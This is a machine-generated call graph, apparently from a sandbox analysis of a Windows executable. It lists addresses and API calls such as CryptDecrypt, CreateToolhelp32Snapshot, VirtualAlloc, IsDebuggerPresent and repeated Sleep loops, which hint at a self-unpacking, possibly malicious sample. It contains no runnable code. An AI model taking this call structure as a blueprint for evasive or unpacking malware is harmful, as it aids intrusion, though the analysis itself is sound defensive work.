CryptDestroyKey 42439->42419 42440 4036ac CryptDecrypt 42440->42439 42440->42441 42441->42439 42441->42440 42443 413679 42442->42443 42447 4133e8 42443->42447 42446->42432 42448 4133ff 42447->42448 42449 413411 42448->42449 42450 413429 42448->42450 42461 4035ac CryptHashData 42448->42461 42474 411401 14 API calls __dosmaperr 42449->42474 42476 411431 37 API calls 2 library calls 42450->42476 42453 413416 42475 411327 25 API calls ___std_exception_copy 42453->42475 42454 413434 42456 413461 42454->42456 42457 413442 42454->42457 42459 413533 42456->42459 42460 413469 42456->42460 42477 41b42a 19 API calls 2 library calls 42457->42477 42459->42461 42482 41b342 MultiByteToWideChar 42459->42482 42460->42461 42478 41b342 MultiByteToWideChar 42460->42478 42461->42433 42461->42434 42464 4134ab 42464->42461 42466 4134b6 GetLastError 42464->42466 42465 41355d 42465->42461 42483 411401 14 API calls __dosmaperr 42465->42483 42471 413516 42466->42471 42473 4134c1 42466->42473 42469 413500 42480 41b342 MultiByteToWideChar 42469->42480 42471->42461 42481 411401 14 API calls __dosmaperr 42471->42481 42473->42469 42473->42471 42479 41b308 37 API calls __fassign 42473->42479 42474->42453 42475->42461 42476->42454 42477->42461 42478->42464 42479->42473 42480->42471 42481->42461 42482->42465 42483->42461 42484 7aa79c 42485 7aa7d8 42484->42485 42488 7aa9a6 42485->42488 42489 7aa9b5 42488->42489 42492 7ab146 42489->42492 42493 7ab161 42492->42493 42494 7ab16a CreateToolhelp32Snapshot 42493->42494 42495 7ab186 Module32First 42493->42495 42494->42493 42494->42495 42496 7aa9a5 42495->42496 42497 7ab195 42495->42497 42499 7aae05 42497->42499 42500 7aae30 42499->42500 42501 7aae79 42500->42501 42502 7aae41 VirtualAlloc 42500->42502 42501->42501 42502->42501 42503 40d4f8 42504 40d504 ___scrt_is_nonwritable_in_current_image 42503->42504 42531 40d258 42504->42531 42506 40d50b 42507 40d65e 42506->42507 42519 40d535 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 42506->42519 42625 40d7b5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 42507->42625 42509 40d665 42626 414d8d 42509->42626 42513 40d673 42514 40d554 42515 40d5d5 42539 40d8d0 42515->42539 42519->42514 42519->42515 42621 414d67 37 API calls 4 library calls 42519->42621 42523 40d5f0 42622 40d906 GetModuleHandleW 42523->42622 42525 40d5f7 42525->42509 42526 40d5fb 42525->42526 42527 40d604 42526->42527 42623 414d42 23 API calls CallUnexpected 42526->42623 42624 40d3c9 73 API calls ___scrt_uninitialize_crt 42527->42624 42530 40d60c 42530->42514 42532 40d261 42531->42532 42630 40d9b3 IsProcessorFeaturePresent 42532->42630 42534 40d26d 42631 40faa6 10 API calls 2 library calls 42534->42631 42536 40d272 42537 40d276 42536->42537 42632 40fac5 7 API calls 2 library calls 42536->42632 42537->42506 42633 40ea40 42539->42633 42542 40d5db 42543 417166 42542->42543 42635 41ee83 42543->42635 42545 41716f 42546 40d5e3 42545->42546 42641 41f129 37 API calls 42545->42641 42548 408e60 42546->42548 42549 408ec6 42548->42549 42549->42549 42550 402460 27 API calls 42549->42550 42551 408edc CallUnexpected 42550->42551 42644 409fc0 42551->42644 42553 408f22 42673 40b9b0 42553->42673 42555 408fb3 42556 408fd6 GetModuleFileNameA 42555->42556 42557 4093fe 42555->42557 42559 409011 42556->42559 42568 409474 42557->42568 42589 4093f9 std::ios_base::_Ios_base_dtor 42557->42589 43128 40d10c 6 API calls 42557->43128 42559->42559 42566 402460 27 API calls 42559->42566 42561 408f52 42561->42555 42564 40b9b0 27 API calls 42561->42564 43103 40a850 42561->43103 43119 40b220 27 API calls 4 library calls 42561->43119 42562 40a850 27 API calls 42565 40957f 42562->42565 42564->42561 42569 40a850 27 API calls 42565->42569 42574 40902d 42566->42574 42567 409439 42567->42568 43129 40d41e 28 API calls 42567->43129 42568->42568 42572 402460 27 API calls 42568->42572 42570 40958a 42569->42570 42573 4063d0 63 API calls 42570->42573 42576 4094ea 42572->42576 42585 40958f std::ios_base::_Ios_base_dtor 42573->42585 42577 409062 42574->42577 42578 4091e7 42574->42578 42575 409467 43130 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42575->43130 42576->42589 43131 40b040 27 API calls 3 library calls 42576->43131 42592 4090cf 42577->42592 43120 40d10c 6 API calls 42577->43120 42587 409216 42578->42587 42588 40936f 42578->42588 42583 4096aa 42591 411337 25 API calls 42583->42591 42584 409095 42584->42592 43121 40d41e 28 API calls 42584->43121 42585->42583 43132 409bf0 25 API calls std::ios_base::_Ios_base_dtor 42585->43132 42586 4095fe std::ios_base::_Ios_base_dtor 43133 40a580 25 API calls 2 library calls 42586->43133 42604 409283 42587->42604 43124 40d10c 6 API calls 42587->43124 42590 402460 27 API calls 42588->42590 42589->42562 42589->42583 42594 409394 42590->42594 42618 4096af 42591->42618 42595 402460 27 API calls 42592->42595 42598 402460 27 API calls 42594->42598 42600 40915a 42595->42600 42597 4090c2 43122 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42597->43122 42603 4093b9 42598->42603 42620 409168 std::ios_base::_Ios_base_dtor 42600->42620 43123 40b040 27 API calls 3 library calls 42600->43123 42601 409249 42601->42604 43125 40d41e 28 API calls 42601->43125 42681 4063d0 42603->42681 42608 402460 27 API calls 42604->42608 42605 409650 42605->42583 42609 40967c std::ios_base::_Ios_base_dtor 42605->42609 42613 40930a 42608->42613 42611 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 42609->42611 42614 40969c 42611->42614 42612 409276 43126 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42612->43126 42613->42620 43127 40b040 27 API calls 3 library calls 42613->43127 42614->42523 42617 4096a5 42619 411337 25 API calls 42617->42619 42618->42523 42619->42583 42620->42589 42620->42617 42621->42515 42622->42525 42623->42527 42624->42530 42625->42509 43471 414c2b 42626->43471 42629 414d51 23 API calls CallUnexpected 42629->42513 42630->42534 42631->42536 42632->42537 42634 40d8e3 GetStartupInfoW 42633->42634 42634->42542 42636 41eebe 42635->42636 42637 41ee8c 42635->42637 42636->42545 42642 418ee0 37 API calls 3 library calls 42637->42642 42639 41eeaf 42643 41eccf 47 API calls 4 library calls 42639->42643 42641->42545 42642->42639 42643->42636 43134 404150 42644->43134 42646 40a0b2 43143 4015c0 27 API calls 5 library calls 42646->43143 42648 40a0b9 43144 40c516 43 API calls 5 library calls 42648->43144 42650 40a0d3 43145 40abe0 74 API calls 5 library calls 42650->43145 42652 40a14d 43146 4015c0 27 API calls 5 library calls 42652->43146 42653 40a104 42653->42652 42654 404150 27 API calls 42653->42654 42654->42652 42656 40a17f 43147 40c516 43 API calls 5 library calls 42656->43147 42658 40a196 42659 40a2a8 42658->42659 42660 40a228 42658->42660 43150 40c289 RaiseException Concurrency::cancel_current_task CallUnexpected 42659->43150 42663 40a253 42660->42663 42664 40a234 42660->42664 42672 40a248 _Yarn 42660->42672 42662 40a2ad 43151 4015c0 27 API calls 3 library calls 42662->43151 43149 4015c0 27 API calls 5 library calls 42663->43149 42664->42662 42666 40a23b 42664->42666 43148 4015c0 27 API calls 5 library calls 42666->43148 42668 40a241 42670 411337 25 API calls 42668->42670 42668->42672 42671 40a2b7 42670->42671 42671->42553 42672->42553 42674 40b9fc 42673->42674 43155 40bf10 42674->43155 42676 40ba65 42678 404150 27 API calls 42676->42678 42677 40ba10 42677->42676 43162 40b4e0 27 API calls 4 library calls 42677->43162 42679 40bbe4 42678->42679 42679->42561 43164 414f0a GetSystemTimeAsFileTime 42681->43164 42683 40641f 43166 414dc4 42683->43166 42686 402460 27 API calls 42687 40645e std::ios_base::_Ios_base_dtor 42686->42687 42688 402460 27 API calls 42687->42688 42711 4064c9 std::ios_base::_Ios_base_dtor CallUnexpected 42687->42711 42688->42711 42691 40cfd1 27 API calls 42691->42711 42692 4068b1 43206 407310 42692->43206 42695 4068d8 43216 4022c0 42695->43216 42696 402460 27 API calls 42696->42711 42699 4068e8 43220 4021f0 42699->43220 42703 4068fc 42704 4069d1 42703->42704 42705 406904 42703->42705 43293 4075b0 39 API calls 2 library calls 42704->43293 42712 406974 42705->42712 42713 406917 42705->42713 42708 411337 25 API calls 42708->42711 42709 4069d6 42718 4022c0 27 API calls 42709->42718 42710 406865 Sleep 42710->42711 42711->42691 42711->42692 42711->42696 42711->42708 42711->42710 42723 40688a 42711->42723 42733 406871 42711->42733 42735 40685b std::ios_base::_Ios_base_dtor 42711->42735 43169 414eda 42711->43169 43173 404450 42711->43173 43185 40b900 42711->43185 43190 401d20 42711->43190 43273 40d10c 6 API calls 42711->43273 43274 40d41e 28 API calls 42711->43274 43275 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 42711->43275 43288 4074a0 39 API calls 2 library calls 42712->43288 43283 407390 39 API calls 2 library calls 42713->43283 42716 406979 42720 4022c0 27 API calls 42716->42720 42717 40691c 42721 4022c0 27 API calls 42717->42721 42719 4069e6 42718->42719 42725 4021f0 25 API calls 42719->42725 42722 406989 42720->42722 42724 40692c 42721->42724 43289 402240 25 API calls std::ios_base::_Ios_base_dtor 42722->43289 43279 40a800 27 API calls 42723->43279 43284 402240 25 API calls std::ios_base::_Ios_base_dtor 42724->43284 42729 4069fa 42725->42729 42730 406ad0 42729->42730 42731 406a02 42729->42731 43302 407950 39 API calls 2 library calls 42730->43302 43294 407630 39 API calls 2 library calls 42731->43294 42732 406992 42740 4021f0 25 API calls 42732->42740 42733->42723 43276 4045e0 42733->43276 42734 406896 42742 4021f0 25 API calls 42734->42742 42735->42710 42736 406935 42737 4021f0 25 API calls 42736->42737 42743 40693d 42737->42743 42746 40699a 42740->42746 42747 40689e 42742->42747 43285 407420 39 API calls 2 library calls 42743->43285 42744 406a07 42755 4022c0 27 API calls 42744->42755 42745 406ad5 42756 4022c0 27 API calls 42745->42756 43290 407530 39 API calls 2 library calls 42746->43290 42750 4021f0 25 API calls 42747->42750 42751 4068a6 42750->42751 43280 4016d0 42751->43280 42752 406942 42759 4022c0 27 API calls 42752->42759 42753 40699f 42761 4022c0 27 API calls 42753->42761 42757 406a17 42755->42757 42758 406ae5 42756->42758 43295 402240 25 API calls std::ios_base::_Ios_base_dtor 42757->43295 42767 4021f0 25 API calls 42758->42767 42762 406952 42759->42762 42764 4069af 42761->42764 43286 402240 25 API calls std::ios_base::_Ios_base_dtor 42762->43286 42763 406a20 42766 4021f0 25 API calls 42763->42766 43291 402240 25 API calls std::ios_base::_Ios_base_dtor 42764->43291 42771 406a28 42766->42771 42772 406af9 42767->42772 42769 4069b8 42773 4021f0 25 API calls 42769->42773 42770 40695b 42774 4021f0 25 API calls 42770->42774 43296 4076b0 39 API calls 2 library calls 42771->43296 42776 406bba 42772->42776 43303 4079d0 39 API calls 2 library calls 42772->43303 42779 4069c0 42773->42779 42780 406963 42774->42780 43311 407cf0 39 API calls 2 library calls 42776->43311 43292 40a800 27 API calls 42779->43292 43287 40a800 27 API calls 42780->43287 42781 406a2d 42787 4022c0 27 API calls 42781->42787 42782 406b06 42789 4022c0 27 API calls 42782->42789 42783 406bc4 42790 4022c0 27 API calls 42783->42790 42786 40696f 42791 406f5a 42786->42791 43349 4021c0 27 API calls 42786->43349 42788 406a3d 42787->42788 43297 402240 25 API calls std::ios_base::_Ios_base_dtor 42788->43297 42793 406b16 42789->42793 42794 406bd4 42790->42794 43228 401670 42791->43228 43304 402240 25 API calls std::ios_base::_Ios_base_dtor 42793->43304 42805 4021f0 25 API calls 42794->42805 42797 406a46 42800 4021f0 25 API calls 42797->42800 42799 406f6d 43232 408a70 42799->43232 42803 406a4e 42800->42803 42801 406b1f 42804 4021f0 25 API calls 42801->42804 43298 407730 39 API calls 2 library calls 42803->43298 42808 406b27 42804->42808 42809 406be8 42805->42809 42806 406f76 42813 4022c0 27 API calls 42806->42813 43305 407a50 39 API calls 2 library calls 42808->43305 42812 406ccf 42809->42812 43312 407d70 39 API calls 2 library calls 42809->43312 42810 406a53 42821 4022c0 27 API calls 42810->42821 43322 408110 39 API calls 2 library calls 42812->43322 42817 406f89 42813->42817 42815 406b2c 42824 4022c0 27 API calls 42815->42824 43242 4089f0 42817->43242 42818 406cd9 42826 4022c0 27 API calls 42818->42826 42819 406bf5 42825 4022c0 27 API calls 42819->42825 42823 406a63 42821->42823 42822 406f94 42833 4022c0 27 API calls 42822->42833 42834 4021f0 25 API calls 42823->42834 42827 406b3c 42824->42827 42829 406c05 42825->42829 42830 406ce9 42826->42830 43306 402240 25 API calls std::ios_base::_Ios_base_dtor 42827->43306 43313 402240 25 API calls std::ios_base::_Ios_base_dtor 42829->43313 42839 4021f0 25 API calls 42830->42839 42831 406b45 42835 4021f0 25 API calls 42831->42835 42837 406fa7 42833->42837 42838 406a77 42834->42838 42840 406b4d 42835->42840 42836 406c0e 42841 4021f0 25 API calls 42836->42841 43252 408950 42837->43252 42843 406a98 42838->42843 42844 406a7b 42838->42844 42846 406cfd 42839->42846 43307 407ad0 39 API calls 2 library calls 42840->43307 42848 406c16 42841->42848 43300 407840 39 API calls 2 library calls 42843->43300 43299 4077c0 39 API calls 2 library calls 42844->43299 42852 406d01 42846->42852 42853 406d7f 42846->42853 43314 407df0 39 API calls 2 library calls 42848->43314 42850 406fb2 42862 4022c0 27 API calls 42850->42862 42851 406a80 42863 4022c0 27 API calls 42851->42863 43323 4081a0 39 API calls 2 library calls 42852->43323 43329 408330 39 API calls 2 library calls 42853->43329 42854 406b52 42864 4022c0 27 API calls 42854->42864 42856 406a9d 42865 4022c0 27 API calls 42856->42865 42859 406c1b 42869 4022c0 27 API calls 42859->42869 42860 406d84 42873 4022c0 27 API calls 42860->42873 42861 406d06 42874 4022c0 27 API calls 42861->42874 42866 406fc5 42862->42866 42867 406a90 42863->42867 42868 406b62 42864->42868 42870 406aad 42865->42870 43262 40ad00 42866->43262 43348 402240 25 API calls std::ios_base::_Ios_base_dtor 42867->43348 42884 4021f0 25 API calls 42868->42884 42875 406c2b 42869->42875 42886 4021f0 25 API calls 42870->42886 42878 406d94 42873->42878 42879 406d16 42874->42879 43315 402240 25 API calls std::ios_base::_Ios_base_dtor 42875->43315 42894 4021f0 25 API calls 42878->42894 43324 402240 25 API calls std::ios_base::_Ios_base_dtor 42879->43324 42881 406ff2 43270 40ae10 42881->43270 42882 406f41 42889 4021f0 25 API calls 42882->42889 42891 406b76 42884->42891 42885 406c34 42892 4021f0 25 API calls 42885->42892 42887 406ac1 42886->42887 42887->42786 43301 4078d0 39 API calls 2 library calls 42887->43301 42889->42786 42890 406d1f 42895 4021f0 25 API calls 42890->42895 42896 406b84 42891->42896 42897 406b7a 42891->42897 42898 406c3c 42892->42898 42903 406da8 42894->42903 42904 406d27 42895->42904 43309 407be0 39 API calls 2 library calls 42896->43309 43308 407b60 39 API calls 2 library calls 42897->43308 43316 407e70 39 API calls 2 library calls 42898->43316 42902 40ad60 27 API calls 42908 40701f 42902->42908 42909 406e2a 42903->42909 42910 406dac 42903->42910 43325 408220 39 API calls 2 library calls 42904->43325 42906 406c41 42919 4022c0 27 API calls 42906->42919 42907 406b89 42920 4022c0 27 API calls 42907->42920 42912 40ae10 27 API calls 42908->42912 43336 408540 39 API calls 2 library calls 42909->43336 43330 4083c0 39 API calls 2 library calls 42910->43330 42916 407034 42912->42916 42915 406d2c 42922 4022c0 27 API calls 42915->42922 42921 40ad60 27 API calls 42916->42921 42917 406e2f 42926 4022c0 27 API calls 42917->42926 42918 406db1 42927 4022c0 27 API calls 42918->42927 42923 406c51 42919->42923 42924 406b99 42920->42924 42925 40704c 42921->42925 42928 406d3c 42922->42928 43317 402240 25 API calls std::ios_base::_Ios_base_dtor 42923->43317 42939 4021f0 25 API calls 42924->42939 42930 4021f0 25 API calls 42925->42930 42931 406e3f 42926->42931 42932 406dc1 42927->42932 43326 402240 25 API calls std::ios_base::_Ios_base_dtor 42928->43326 42935 40705a 42930->42935 42946 4021f0 25 API calls 42931->42946 43331 402240 25 API calls std::ios_base::_Ios_base_dtor 42932->43331 42934 406c5a 42938 4021f0 25 API calls 42934->42938 42940 4021f0 25 API calls 42935->42940 42937 406d45 42942 4021f0 25 API calls 42937->42942 42943 406c62 42938->42943 42944 406bad 42939->42944 42945 407065 42940->42945 42941 406dca 42947 4021f0 25 API calls 42941->42947 42948 406d4d 42942->42948 43318 407ef0 39 API calls 2 library calls 42943->43318 42944->42786 43310 407c70 39 API calls 2 library calls 42944->43310 42950 4021f0 25 API calls 42945->42950 42952 406e53 42946->42952 42953 406dd2 42947->42953 43327 4082b0 39 API calls 2 library calls 42948->43327 42951 407070 42950->42951 42957 4021f0 25 API calls 42951->42957 42958 406e57 42952->42958 42959 406eaa 42952->42959 43332 408440 39 API calls 2 library calls 42953->43332 42955 406c67 42968 4022c0 27 API calls 42955->42968 42962 40707b 42957->42962 43337 4085d0 39 API calls 2 library calls 42958->43337 43342 408750 39 API calls 2 library calls 42959->43342 42961 406d52 42971 4022c0 27 API calls 42961->42971 42966 4021f0 25 API calls 42962->42966 42964 406dd7 42974 4022c0 27 API calls 42964->42974 42970 407086 42966->42970 42967 406e5c 42978 4022c0 27 API calls 42967->42978 42972 406c77 42968->42972 42969 406eaf 42976 4022c0 27 API calls 42969->42976 42973 4021f0 25 API calls 42970->42973 42975 406d62 42971->42975 42981 4021f0 25 API calls 42972->42981 42977 407091 42973->42977 42979 406de7 42974->42979 43328 402240 25 API calls std::ios_base::_Ios_base_dtor 42975->43328 42982 406ebf 42976->42982 42983 4021f0 25 API calls 42977->42983 42984 406e6c 42978->42984 43333 402240 25 API calls std::ios_base::_Ios_base_dtor 42979->43333 42987 406c8b 42981->42987 42998 4021f0 25 API calls 42982->42998 42988 40709c 42983->42988 43338 402240 25 API calls std::ios_base::_Ios_base_dtor 42984->43338 42986 406d6b 42991 4021f0 25 API calls 42986->42991 42992 406c94 42987->42992 43319 407f80 39 API calls 2 library calls 42987->43319 42993 4021f0 25 API calls 42988->42993 42990 406df0 42995 4021f0 25 API calls 42990->42995 42991->42786 43320 408000 39 API calls 2 library calls 42992->43320 43036 4070ab 42993->43036 42994 406e75 43000 4021f0 25 API calls 42994->43000 42996 406df8 42995->42996 43334 4084c0 39 API calls 2 library calls 42996->43334 43003 406ed3 42998->43003 43001 406e7d 43000->43001 43339 408650 39 API calls 2 library calls 43001->43339 43003->42786 43343 4087d0 39 API calls 2 library calls 43003->43343 43004 406c9e 43010 4022c0 27 API calls 43004->43010 43006 406dfd 43011 4022c0 27 API calls 43006->43011 43007 406e82 43014 4022c0 27 API calls 43007->43014 43009 406edc 43018 4022c0 27 API calls 43009->43018 43012 406cae 43010->43012 43015 406e0d 43011->43015 43019 4021f0 25 API calls 43012->43019 43013 40710a Sleep 43013->43036 43016 406e92 43014->43016 43335 402240 25 API calls std::ios_base::_Ios_base_dtor 43015->43335 43340 402240 25 API calls std::ios_base::_Ios_base_dtor 43016->43340 43022 406eec 43018->43022 43023 406cc2 43019->43023 43021 406e16 43026 4021f0 25 API calls 43021->43026 43344 402240 25 API calls std::ios_base::_Ios_base_dtor 43022->43344 43023->42786 43321 408090 39 API calls 2 library calls 43023->43321 43024 4022c0 27 API calls 43024->43036 43025 406e9b 43029 4021f0 25 API calls 43025->43029 43026->42786 43028 406ef5 43030 4021f0 25 API calls 43028->43030 43032 406ea3 43029->43032 43033 406efd 43030->43033 43341 4086d0 39 API calls 2 library calls 43032->43341 43345 408850 39 API calls 2 library calls 43033->43345 43036->43013 43036->43024 43037 407113 43036->43037 43043 407102 43036->43043 43039 4021f0 25 API calls 43037->43039 43038 406f02 43046 4022c0 27 API calls 43038->43046 43040 40711b 43039->43040 43042 40a850 27 API calls 43040->43042 43041 406ea8 43044 4022c0 27 API calls 43041->43044 43045 40712f 43042->43045 43047 4021f0 25 API calls 43043->43047 43044->42867 43048 40a850 27 API calls 43045->43048 43049 406f12 43046->43049 43047->43013 43050 407148 43048->43050 43346 402240 25 API calls std::ios_base::_Ios_base_dtor 43049->43346 43052 40a850 27 API calls 43050->43052 43057 40715b 43052->43057 43053 406f1b 43054 4021f0 25 API calls 43053->43054 43055 406f23 43054->43055 43347 4088d0 39 API calls 2 library calls 43055->43347 43058 40a850 27 API calls 43057->43058 43060 40718b 43057->43060 43058->43060 43350 408b00 39 API calls 2 library calls 43060->43350 43061 407198 43062 4022c0 27 API calls 43061->43062 43063 4071a8 43062->43063 43064 4021f0 25 API calls 43063->43064 43065 4071bc 43064->43065 43066 407260 43065->43066 43068 401670 27 API calls 43065->43068 43352 408c70 39 API calls 2 library calls 43066->43352 43070 4071d7 43068->43070 43069 407265 43073 4022c0 27 API calls 43069->43073 43351 408b90 39 API calls 2 library calls 43070->43351 43072 4071e0 43075 4022c0 27 API calls 43072->43075 43074 407278 43073->43074 43076 4021f0 25 API calls 43074->43076 43078 4071f0 43075->43078 43077 40728f 43076->43077 43102 4072ef 43077->43102 43353 408de0 39 API calls 2 library calls 43077->43353 43083 407227 43078->43083 43084 407218 Sleep 43078->43084 43079 4045e0 23 API calls 43081 407300 43079->43081 43082 4072a0 43086 4022c0 27 API calls 43082->43086 43089 4022c0 27 API calls 43083->43089 43084->43078 43085 407225 43084->43085 43087 407249 43085->43087 43088 4072af 43086->43088 43090 4021f0 25 API calls 43087->43090 43354 408d60 39 API calls 2 library calls 43088->43354 43093 40723e 43089->43093 43091 407251 43090->43091 43094 4016d0 CoUninitialize 43091->43094 43096 4021f0 25 API calls 43093->43096 43094->43066 43095 4072c3 43097 4022c0 27 API calls 43095->43097 43096->43087 43098 4072d2 43097->43098 43355 408d00 39 API calls __Init_thread_footer 43098->43355 43100 4072e0 43101 4022c0 27 API calls 43100->43101 43101->43102 43102->43079 43104 40a87b 43103->43104 43105 40a882 43104->43105 43106 40a8d4 43104->43106 43107 40a8b5 43104->43107 43105->42561 43114 40a8c9 _Yarn 43106->43114 43468 4015c0 27 API calls 5 library calls 43106->43468 43108 40a90a 43107->43108 43109 40a8bc 43107->43109 43469 4015c0 27 API calls 3 library calls 43108->43469 43467 4015c0 27 API calls 5 library calls 43109->43467 43113 40a8c2 43113->43114 43115 411337 25 API calls 43113->43115 43114->42561 43116 40a914 43115->43116 43470 409bf0 25 API calls std::ios_base::_Ios_base_dtor 43116->43470 43118 40a92b std::ios_base::_Ios_base_dtor 43118->42561 43119->42561 43120->42584 43121->42597 43122->42592 43123->42620 43124->42601 43125->42612 43126->42604 43127->42620 43128->42567 43129->42575 43130->42568 43131->42589 43132->42586 43133->42605 43135 404171 43134->43135 43136 404169 43134->43136 43135->42646 43138 404180 43136->43138 43152 40e393 RaiseException 43136->43152 43153 40e393 RaiseException 43138->43153 43140 4041bf 43154 40e131 26 API calls 2 library calls 43140->43154 43142 4041e4 43142->42646 43143->42648 43144->42650 43145->42653 43146->42656 43147->42658 43148->42668 43149->42672 43151->42668 43152->43138 43153->43140 43154->43142 43156 40bf70 43155->43156 43157 40bf42 43155->43157 43161 40bf7c 43156->43161 43163 40bfa0 27 API calls 43156->43163 43158 404150 27 API calls 43157->43158 43159 40bf5c 43158->43159 43159->42677 43161->42677 43162->42677 43163->43161 43165 414f3c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 43164->43165 43165->42683 43356 418e23 GetLastError 43166->43356 43170 414ef2 43169->43170 43171 414ee8 43169->43171 43170->42711 43401 414dd6 41 API calls 2 library calls 43171->43401 43184 404491 std::ios_base::_Ios_base_dtor 43173->43184 43174 40a850 27 API calls 43174->43184 43175 404571 std::ios_base::_Ios_base_dtor 43176 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43175->43176 43178 4045d3 43176->43178 43178->42711 43179 40452d 43179->43175 43181 4045d7 43179->43181 43180 404515 std::ios_base::_Ios_base_dtor 43180->43175 43180->43181 43402 40b620 25 API calls std::ios_base::_Ios_base_dtor 43180->43402 43182 411337 25 API calls 43181->43182 43183 4045dc 43182->43183 43184->43174 43184->43180 43184->43181 43186 40b988 43185->43186 43189 40b91a _Yarn 43185->43189 43403 40bd10 27 API calls 4 library calls 43186->43403 43188 40b99a 43188->42711 43189->42711 43191 401d72 43190->43191 43191->43191 43192 402460 27 API calls 43191->43192 43193 401d85 43192->43193 43194 402460 27 API calls 43193->43194 43195 401e4d _Yarn 43194->43195 43404 411414 43195->43404 43198 401f83 43199 401ff3 std::ios_base::_Ios_base_dtor 43198->43199 43201 402022 43198->43201 43200 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43199->43200 43202 402017 43200->43202 43203 411337 25 API calls 43201->43203 43202->42711 43204 402027 43203->43204 43205 401d20 39 API calls 43204->43205 43207 40736e 43206->43207 43208 40733c 43206->43208 43210 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43207->43210 43433 40d10c 6 API calls 43208->43433 43212 407380 43210->43212 43211 407346 43211->43207 43434 40d41e 28 API calls 43211->43434 43212->42695 43214 407364 43435 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43214->43435 43217 4022e3 43216->43217 43217->43217 43218 402460 27 API calls 43217->43218 43219 4022f5 43218->43219 43219->42699 43221 4021fb 43220->43221 43222 402216 std::ios_base::_Ios_base_dtor 43220->43222 43221->43222 43223 411337 25 API calls 43221->43223 43222->42703 43224 40223a 43223->43224 43225 402271 std::ios_base::_Ios_base_dtor 43224->43225 43226 411337 25 API calls 43224->43226 43225->42703 43227 4022bc 43226->43227 43229 401683 CallUnexpected 43228->43229 43230 40cfd1 27 API calls 43229->43230 43231 40169a CallUnexpected 43230->43231 43231->42799 43233 408ade 43232->43233 43234 408aa2 43232->43234 43236 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43233->43236 43436 40d10c 6 API calls 43234->43436 43238 408af0 43236->43238 43237 408aac 43237->43233 43437 40d41e 28 API calls 43237->43437 43238->42806 43240 408ad4 43438 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43240->43438 43243 408a1c 43242->43243 43251 408a4e 43242->43251 43439 40d10c 6 API calls 43243->43439 43244 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43246 408a60 43244->43246 43246->42822 43247 408a26 43247->43251 43440 40d41e 28 API calls 43247->43440 43249 408a44 43441 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43249->43441 43251->43244 43253 4089d2 43252->43253 43254 40898d 43252->43254 43255 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43253->43255 43442 40d10c 6 API calls 43254->43442 43257 4089e5 43255->43257 43257->42850 43258 408997 43258->43253 43443 40d41e 28 API calls 43258->43443 43260 4089c8 43444 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 43260->43444 43263 40ad12 43262->43263 43264 40b900 27 API calls 43263->43264 43265 406fda 43264->43265 43266 40ad60 43265->43266 43267 40ad79 43266->43267 43268 40ad8d _Yarn 43267->43268 43445 402730 27 API calls 4 library calls 43267->43445 43268->42881 43446 40b720 43270->43446 43272 407007 43272->42902 43273->42711 43274->42711 43275->42711 43277 414d8d 23 API calls 43276->43277 43278 4045e7 43277->43278 43279->42734 43281 4016da 43280->43281 43282 4016ea CoUninitialize 43281->43282 43283->42717 43284->42736 43285->42752 43286->42770 43287->42786 43288->42716 43289->42732 43290->42753 43291->42769 43292->42786 43293->42709 43294->42744 43295->42763 43296->42781 43297->42797 43298->42810 43299->42851 43300->42856 43301->42851 43302->42745 43303->42782 43304->42801 43305->42815 43306->42831 43307->42854 43308->42851 43309->42907 43310->42776 43311->42783 43312->42819 43313->42836 43314->42859 43315->42885 43316->42906 43317->42934 43318->42955 43319->42992 43320->43004 43321->42812 43322->42818 43323->42861 43324->42890 43325->42915 43326->42937 43327->42961 43328->42986 43329->42860 43330->42918 43331->42941 43332->42964 43333->42990 43334->43006 43335->43021 43336->42917 43337->42967 43338->42994 43339->43007 43340->43025 43341->43041 43342->42969 43343->43009 43344->43028 43345->43038 43346->43053 43347->43041 43348->42882 43349->42791 43350->43061 43351->43072 43352->43069 43353->43082 43354->43095 43355->43100 43357 418e40 43356->43357 43358 418e3a 43356->43358 43363 418e46 SetLastError 43357->43363 43387 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43357->43387 43386 419b73 6 API calls std::_Locinfo::_Locinfo_dtor 43358->43386 43361 418e5e 43362 418e62 43361->43362 43361->43363 43388 41968b 14 API calls 3 library calls 43362->43388 43369 406428 Sleep 43363->43369 43370 418eda 43363->43370 43365 418e6e 43367 418e76 43365->43367 43368 418e8d 43365->43368 43389 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43367->43389 43396 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43368->43396 43369->42686 43399 4160b9 37 API calls CallUnexpected 43370->43399 43375 418e99 43376 418e9d 43375->43376 43377 418eae 43375->43377 43397 419bb2 6 API calls std::_Locinfo::_Locinfo_dtor 43376->43397 43398 418c51 14 API calls __Getctype 43377->43398 43381 418e84 43390 4196e8 43381->43390 43382 418eb9 43384 4196e8 _free 14 API calls 43382->43384 43383 418e8a 43383->43363 43385 418ec0 43384->43385 43385->43363 43386->43357 43387->43361 43388->43365 43389->43381 43391 4196f3 RtlFreeHeap 43390->43391 43395 41971c __dosmaperr 43390->43395 43392 419708 